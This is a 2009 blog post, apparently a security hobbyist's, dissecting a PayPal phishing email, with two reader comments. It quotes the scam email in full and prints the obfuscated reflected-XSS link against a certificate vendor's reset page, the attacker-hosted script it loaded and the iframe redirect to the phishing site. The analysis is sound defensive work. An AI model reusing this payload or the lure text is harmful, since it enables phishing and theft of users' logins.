Wednesday, March 25, 2009

Analysis of a Real World Phishing Scheme


I received a lot of positive feedback around my blog post “Analysis of a Real World Hacking Attempt” and decided that after a recent email attempting to direct me to a paypal phishing site, it again was time to give a little insight as to what the latest attempts on phishing schemes are out there...

The email that read something like this:

Information about your account:
Security Center

Attention! Your PayPal account was limited!

As part of our security measures, we regularly check the work of the screen PayPal. We have requested information from you for the following reason:

Our system has detected unusual charges to a credit card linked to your PayPal account.

Reference Number: PP-259-187-991

This is the last reminder to log into PayPal, as soon as possible. Once you connect. PayPal will provide measures to restore access to your account.

Once connected, follow the steps to activate your account. We appreciate your understanding as we work to ensure security.

Clik Here To Activate

We appreciate your attention to this issue. Please understand that this is a security measure designed to protect you and your account. We apologize for any inconvenience ..

Department review PayPal accounts
________________________________________
Copyright © 1999-2009 PayPal. All rights reserved.
PayPal FSA Register Number: 226056.

Yes, they actually misspelled “click” on the phishing link, as well as other typos such as a double period, etc.

The link’s target location was:
https://secure.instantssl.com/products/passwordResetRequest? orderNumber="><image src="" onerror= "javascript:document.write(String.fromCharCode(60,83 ,67,82,73,80,84,32,83,82,67,61,34 ,104,116,116,112,58,47,47,57,54,46 ,57,46,50,52,46,49,51,48,47,120 ,115,115,49,46,106,112,103,34,62,60 ,47,83,67,82,73,80,84,62))" />

This is a textbook XSS flaw, easily seen by
https://secure.instantssl.com/products/passwordResetRequest?orderNumber= " > [XSS HERE]

If you look at http://96.9.24.130/xss1.jpg it is actually an html file, not a jpg image file.

Its contents are:
<html>
<body>
<img src="http://96.9.24.130/xss1.jpg" alt="http://96.9.24.130/xss1.jpg"/>
</body>
</html>

Firefox even treats it as an image providing right click options over it such as “copy image” and “copy image location”, despite it being a script target in an image tag.

Tricky...and if you save it locally and open it, you can see that the xss1.jpg’s contents is:
document.write("<iframe src='http://transgalaxyproducts.com/bbnse/webscr/webscr.php?cmd=_login-run' width='100%' height='100%' frameborder=0 scrolling=0></iframe>");

Then http://transgalaxyproducts.com/bbnse/webscr/webscr.php?cmd=_login-run is actually the location of the Paypal phishing site...

That was the story as of March 3rd...

Today, March 24th, the code for the xss1.jpg image has changed as seen below:

C:\>nc 96.9.24.130 80
GET /xss1.jpg HTTP/1.0

HTTP/1.1 200 OK
Date: Wed, 25 Mar 2009 00:58:00 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_
auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 07 Mar 2009 10:22:10 GMT
ETag: "6a00c7-8c-46484c62ad880"
Accept-Ranges: bytes
Content-Length: 140
Connection: close
Content-Type: image/jpeg

document.write("<iframe src='http://96.9.24.130/cls/ws-cgi/365236545.html' width
='100%' height='100%' frameborder=0 scrolling=0></iframe>");
C:\>

The page at http://96.9.24.130/cls/ws-cgi/365236545.html seems to be that of a Craigslist listing for a truck in Atlanta, but saved locally to the server. Odd, and I have no guesses as to why this would be there... your guess is as good as mine, but that’s the reality of the stuff that is going on and out there. Hopefully this gave a little insight as to some of the subtle tricks hackers are using to try to steal your information. The IP 96.9.24.130 is in a block owned by Register.com out of New York and has a HTTP banner of "Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635".

Why there is a mirror of a Craiglist page is beyond me, but that’s where I’ll leave you to wonder on your own...
Posted by Scott White at 3:14 AM

2 comments:

Matt Davis said...

I think bad spelling and grammar is one of the easiest ways to spot a phishing attack. When are those phishers going to wise up and start hiring technical writers?? :) Then again, they need cultural help too. Thanks to spammers, I now know that a barrister is basically a lawyer in the UK. Silly phishers!

March 25, 2009 at 10:15 PM
Alex Hamerstone said...

They are getting slowly better as far as grammar and spelling go... I have had some phishing e-mails recently that had zero spelling errors- I only knew they were phishing emails b/c they were from a bank I don't use...
Yup, the Barrister- Main difference is that in the U.S. attorneys act as both barrister and solicitor, where in the U.K they are separate occupations...

May 26, 2009 at 2:38 PM

Post a Comment

Subscribe to: Post Comments (Atom)